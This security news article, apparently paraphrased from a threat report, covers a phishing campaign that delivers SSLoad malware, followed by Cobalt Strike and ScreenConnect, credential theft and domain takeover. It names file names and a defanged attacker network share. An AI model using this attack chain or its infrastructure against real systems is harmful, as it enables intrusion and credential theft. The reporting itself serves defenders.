In the realm of cybersecurity, a persistent campaign has been unearthed, employing deceptive emails to dispense a malicious entity dubbed SSLoad.
This operation, dubbed FROZEN#SHADOW by the vigilant team at Securonix, also incorporates the utilization of Cobalt Strike and the ConnectWise ScreenConnect software for remote desktop access.
“SSLoad operates covertly, penetrating systems clandestinely, collating sensitive data, and surreptitiously transmitting findings to its orchestrators,” articulated security analysts Den Iuzvyk, Tim Peck, and Oleg Kolesnikov in a dossier disseminated to The Hacker News.
“Upon infiltrating a system, SSLoad deploys myriad backdoors and payloads to sustain persistence and evade detection.”
The assault sequences entail the propagation of phishing communications targeting organizations indiscriminately across Asia, Europe, and the Americas. These communications contain hyperlinks that lead to the acquisition of a JavaScript script, instigating the infection cascade.
Recently, Palo Alto Networks uncovered at least two distinct methodologies employed for SSLoad dissemination: one involves the exploitation of website contact forms to embed malicious URLs, while the other employs macro-enabled Microsoft Word documents.
The latter method merits attention due to its function as a conduit for delivering Cobalt Strike, whereas the former has been instrumental in delivering an alternative malware dubbed Latrodectus, purportedly succeeding IcedID.
The obfuscated JavaScript file (“out_czlrh.js”), upon execution via wscript.exe, retrieves an MSI installer file (“slack.msi”) by establishing a connection to a network share situated at “\wireoneinternet[.]info@80\share” and proceeds to execute it using msiexec.exe.
Subsequently, the MSI installer contacts a domain controlled by the assailants to retrieve and execute the SSLoad malware payload via rundll32.exe, subsequently initiating communication with a command-and-control (C2) server along with pertinent details regarding the compromised system.
The initial reconnaissance phase sets the stage for Cobalt Strike, a legitimate software for adversarial simulation, subsequently employed to download and deploy ScreenConnect, thereby facilitating remote control of the compromised host.
“Upon attaining unrestricted access to the system, the adversaries commence efforts to procure credentials and harvest other vital system particulars,” explicated the researchers. “At this juncture, they commence scanning the victimized host for credentials stored within files and other potentially sensitive documents.”
Furthermore, the attackers have been observed pivoting to additional systems within the network, including the domain controller, ultimately infiltrating the victim’s Windows domain by instituting their own domain administrator account.
“Such a degree of access enables them to infiltrate any interconnected machine within the domain,” the researchers asserted. “Ultimately, this scenario epitomizes the worst-case scenario for any organization, given that remediation of the persistence achieved by the attackers would be exorbitantly time-consuming and financially burdensome.”
This revelation coincides with the AhnLab Security Intelligence Center (ASEC) disclosing the infection of Linux systems with an open-source remote access trojan known as Pupy RAT.
